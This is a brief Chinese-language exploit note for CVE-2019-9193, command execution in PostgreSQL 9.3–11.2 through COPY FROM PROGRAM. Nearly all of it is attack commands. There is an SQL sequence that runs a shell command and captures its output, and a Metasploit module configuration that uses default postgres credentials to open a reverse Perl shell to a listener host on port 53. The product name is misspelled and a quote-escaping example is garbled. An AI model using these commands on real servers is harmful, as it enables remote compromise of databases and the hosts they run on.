CVE-2019-9193:PostpreSQL 9.3-11.2 允许经过身份验证的superuser或者拥有pg_read_server_files权限的用户执行任意命令:
drop table if exists cmd_exec; create table cmd_exec(cmd_output text); copy cmd_exec from program 'id'; select * from cmd_exec; drop table if exists cmd_exec;
需要注意的是:命令中的单引号需要用双引号进行转义,如:echo 'test' >> 'echo "test";'
MSF中也有对应的利用模块:
use exploit/multi/postgres/postgres_cmd_execution_nine_three set RHOST 192.168.1.5 set payload cmd/unix.reverse_perl set database postgres set username postgres set password postgres set LHOST 192.168.1.6 set LPORT 53 exploit
参考链接:http://t3ngyu.leanote.com/post/Postgresql